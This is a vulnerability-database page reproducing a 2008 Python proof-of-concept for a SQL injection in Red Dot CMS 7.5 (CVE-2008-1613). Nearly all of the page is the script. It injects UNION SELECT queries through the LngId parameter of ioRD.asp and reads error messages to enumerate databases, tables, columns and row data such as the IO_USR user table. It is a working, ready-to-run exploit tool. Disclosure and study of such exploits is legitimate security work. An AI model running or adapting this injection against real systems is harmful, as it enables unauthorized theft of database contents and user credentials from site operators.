Lucene search

RDdbenum.py.txt

🗓️ 21 Apr 2008 00:00:00Reported by Rodrigo MarcosType

packetstorm🔗 packetstormsecurity.com👁 30 Views

This Python script is used for enumerating database information in Red Dot CMS 7.5, including database enumeration, table enumeration, column enumeration, and data enumeration. It allows specifying databases, tables, and columns with various options

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Reporter	Title	Published	Views	Family All 8
CVE	CVE-2008-1613	22 Apr 200804:41	–	cve
securityvulns	[Full-disclosure] IRM Security Advisory : RedDot CMS SQL injection vulnerability	21 Apr 200800:00	–	securityvulns
securityvulns	Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)	21 Apr 200800:00	–	securityvulns
seebug.org	RedDot CMS ioRD.asp文件SQL注入漏洞	24 Apr 200800:00	–	seebug
Cvelist	CVE-2008-1613	21 Apr 200820:00	–	cvelist
Packet Storm	reddot-sql.txt	21 Apr 200800:00	–	packetstorm
Prion	Sql injection	22 Apr 200804:41	–	prion
NVD	CVE-2008-1613	22 Apr 200804:41	–	nvd

`#!/usr/bin/env python  
  
# un-comment your selection.  
  
import urllib2  
import urllib  
import string  
import getopt  
import sys  
  
def banner():  
print  
print "RED DOT CMS 7.5 database enumeration"  
print "by Mark Crowther and Rodrigo Marcos"  
  
def usage():  
print  
print "usage():"  
print "python RD_POC.py [options] URL"  
print  
print " [options]"  
print " --dbenum: Database enumeration"  
print " --tableenum: Table enumeration, use -d to specify database"  
print " --colenum: Column enumeration, use -d to specify database and -t to specify table"  
print " --dataenum: Data enumeration, use -d to specify database, -t to specify table and -c to specify a column"  
print " -d: Specify a database"  
print " -t: Specify a table"  
print " -c: Specify a column"  
print " -h: Help page"  
print  
print "Examples: "  
print " python RD_POC.py --dbenum http://myhost/cms/"  
print " python RD_POC.py --tableenum -d IoAdministration http://myhost/cms/"  
print " python RD_POC.py --colenum -d IoAdministration -t IO_USR http://myhost/cms/"  
print " python RD_POC.py --dataenum -d IoAdministration -t IO_USR -c USR2 http://myhost/cms/"  
print  
sys.exit()  
  
def retrievedata(url1, url2 = "' ORDER BY 1;-- &DisableAutoLogin=1"):  
stop = 0  
  
current = ''  
  
while (stop==0):  
  
request = url1 + current + url2  
  
request = string.replace(request, ' ', '%20')  
req = urllib2.Request(request)  
try:  
r = urllib2.urlopen(req)  
except urllib2.URLError, msg:  
print "[+] Error: Error requesting URL (%s)" % msg  
result = r.read()  
  
#print result  
if string.find(result, ' Description Conversion failed when converting the ') == -1:  
stop = 1  
else:  
start = string.find(result, "'") + 1  
end = string.find(result[start:], "'") + start  
current = result[start:end]  
print current  
  
  
def dbenum():  
  
retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYS.SYSDATABASES where name> '")  
  
def tableenum(database=''):  
  
if database=='':  
retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where xtype=char(85) and name> '")  
  
else:  
retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM " + database + "..SYSOBJECTS where xtype=char(85) and name> '")  
  
def colenum(table, database=''):  
  
if table=='':  
usage()  
  
if database=='':  
retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSCOLUMNS where name > '", "' AND id = (SELECT id from SYSOBJECTS WHERE name= '" + table + "') ORDER BY 1;-- &DisableAutoLogin=1")  
else:  
retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM " + database + "..SYSCOLUMNS where name > '","' AND id = (SELECT id from " + database + "..SYSOBJECTS WHERE name= '" + table + "') ORDER BY 1;-- &DisableAutoLogin=1")  
  
  
def dataenum(column, table, database=''):  
  
if column=='' or table=='':  
usage()  
  
if database=='':  
retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT MIN(" + column + ") FROM " + table + " WHERE " + column + "> '")  
  
else:  
retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT MIN(" + column + ") FROM " + database + ".." + table + " WHERE " + column + "> '")  
  
  
banner()  
pdbenum = 0  
ptableenum = 0  
pcolenum = 0  
pdataenum = 0  
database = ''  
table = ''  
column = ''  
  
url = sys.argv[len(sys.argv)-1]  
  
try:  
opts, args = getopt.getopt(sys.argv[1:], "d:t:c:h:", ["help", "dbenum", "tableenum", "colenum", "dataenum"])  
except getopt.GetoptError:  
usage()  
  
try:  
for o, a in opts:  
if o in ("-h", "--help"):  
usage()  
if o == "--dbenum":  
pdbenum = 1  
if o == "--tableenum":  
ptableenum = 1  
if o == "--colenum":  
pcolenum = 1  
if o == "--dataenum":  
pdataenum = 1  
if o == "-d":  
database = a  
if o == "-t":  
table = a  
if o == "-c":  
column = a  
except:  
usage()  
  
  
if pdbenum == 1:  
print 'Enumerating databases:'  
dbenum()  
elif ptableenum == 1:  
print 'Enumerating tables:'  
tableenum(database)  
elif pcolenum == 1:  
print 'Enumerating columns:'  
colenum(table, database)  
elif pdataenum == 1:  
print 'Enumerating data:'  
dataenum(column, table, database)  
else:  
usage()  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

21 Apr 2008 00:00Current

6.6Medium risk

Vulners AI Score6.6

EPSS0.00905